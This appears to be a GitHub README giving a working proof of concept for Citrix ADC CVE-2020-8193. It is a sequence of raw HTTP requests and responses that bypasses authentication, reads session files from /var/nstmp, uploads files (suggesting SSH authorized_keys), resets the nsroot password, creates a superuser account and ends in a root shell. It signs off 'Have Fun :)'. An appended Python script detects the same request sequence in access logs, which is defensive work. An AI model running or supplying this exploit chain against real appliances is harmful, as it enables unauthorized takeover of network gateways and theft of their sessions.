Airboi / Citrix-ADC-RCE-CVE-2020-8193

Citrix ADC: from authorization bypass to RCE

Citrix ADC RCE

0x01 CreateSession

request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3

<appfwprofile><login></login></appfwprofile>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. 
Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>

0x02 fix session

request

GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400


response

HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>

0x03 Get rand_key

request

GET /menu/stc HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400


response

HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Statistics</title>
<link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
<script type="text/javascript">
//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
//rand_key & rand are used in utils.js to avoid CSRF in all POST requests
var rand = "181103693.1594540472072128";
var rand_key = "14247218531594540472072170";
var NSERR_SESSION_EXPIRED = 444;

</script>
...
<p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>

note: var rand = "181103693.1594540472072128";

0x04 re-break Session

request

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
X-NITRO-USER: mMg96GTR
X-NITRO-PASS: QXom91tz

<appfwprofile><login></login></appfwprofile>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. 
Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>

0x05 Read Dir

request

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

<clipermission></clipermission>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream

...
sess_6680400dad3be5585d4ac9880d5f634f...
sess_774dd8a02a254bd09c480cd0ba244598...
sess_6c5c31300c22b200f0273e7a13be47cb....

0x06 Read Session

request

POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31

<clipermission></clipermission>

response

HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov  4 2019, 22:20:18   (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception"
;b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";

0x07 UploadFile Getshell

You can upload to /root/.ssh/authorized_key

Note: Get rand_key & SESSID from file: sess_[32 characters]

request

POST /rapi/uploadtext HTTP/1.1
Host: 192.168.3.18:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}

response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8

{"errorcode":"0","message":"Done"}

0x08 ChangePassword && SSH

request

PUT /nitro/v1/config/systemuser HTTP/1.1
Host: 192.168.3.18:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}

response

HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }

SSH

ssh nsroot@192.168.3.18
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################

Password:
Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
 Done
 > shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
	The Regents of the University of California. All rights reserved.

root@localhost

0x08 CreateUser && SSH

request:CreateUser

POST /nitro/v1/config/systemuser HTTP/1.1
Host: 192.168.3.18:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}

response:CreateUser

HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }

request:binding superadmin policy

POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: 192.168.3.18:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close

object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}

response:binding superadmin policy

HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{ "errorcode": 0, "message": "Done", "severity": "NONE" }

SSH

ssh nsroot1@192.168.3.18
###############################################################################
#                                                                             #
#        WARNING: Access to this system is for authorized users only          #
#         Disconnect IMMEDIATELY if you are not an authorized user!           #
#                                                                             #
###############################################################################

Password:
Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
 Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
	The Regents of the University of California. All rights reserved.

root@localhost#

Have Fun :)
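
Added example, not part of the original repository: a log check defenders can run for the request sequence documented in sections 0x01 to 0x08. It assumes the management interface's access log is in Apache combined format; the sample lines, the client addresses and the names `classify` and `find_suspects` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache combined-format access log lines from the management interface.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

BYPASS = "0x01/0x04 /pcidss/report session creation"

def classify(method, target):
    """Return the write-up step a request resembles, or None."""
    url = urlsplit(target)
    query = parse_qs(url.query)  # parse_qs also percent-decodes the values
    if method == "POST" and url.path == "/pcidss/report":
        sid = query.get("sid", [""])[0]
        if sid.startswith("loginchallengeresponse") and "username" in query:
            return BYPASS
    if url.path == "/menu/ss" and query.get("force_setup") == ["1"]:
        return "0x02 /menu/ss force_setup"
    if method == "POST" and url.path == "/rapi/filedownload":
        if query.get("filter", [""])[0].startswith("path:/var/nstmp"):
            return "0x05/0x06 /var/nstmp session store read"
    if method == "POST" and url.path == "/rapi/uploadtext":
        return "0x07 /rapi/uploadtext"
    if method in ("PUT", "POST") and url.path.startswith("/nitro/v1/config/systemuser"):
        return "0x08 systemuser change"
    return None

def find_suspects(lines):
    """Group matches per client; report only clients that sent the bypass request."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        step = classify(m["method"], m["target"])
        if step and step not in seen[m["ip"]]:
            seen[m["ip"]].append(step)
    findings = {}
    for ip, steps in seen.items():
        if BYPASS in steps:
            # Upload and systemuser calls are normal admin traffic on their own,
            # so they only count when the same client also sent the bypass request.
            verdict = "chain" if len(steps) > 1 else "probe"
            findings[ip] = {"verdict": verdict, "steps": steps}
    return findings

# Constructed sample log lines (documentation address ranges, not real clients).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jul/2020:07:52:00 +0000] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 406 4489',
    '198.51.100.7 - - [12/Jul/2020:07:54:31 +0000] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 302 416',
    '198.51.100.7 - - [12/Jul/2020:12:27:04 +0000] "POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1" 406 512',
    '192.0.2.10 - - [12/Jul/2020:09:00:00 +0000] "POST /rapi/uploadtext HTTP/1.1" 200 34',
    '192.0.2.10 - - [12/Jul/2020:09:01:00 +0000] "PUT /nitro/v1/config/systemuser HTTP/1.1" 200 57',
    '203.0.113.5 - - [12/Jul/2020:10:00:00 +0000] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 406 4489',
]

if __name__ == "__main__":
    for ip, info in find_suspects(SAMPLE_LOG).items():
        print(ip, info["verdict"], "; ".join(info["steps"]))
```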
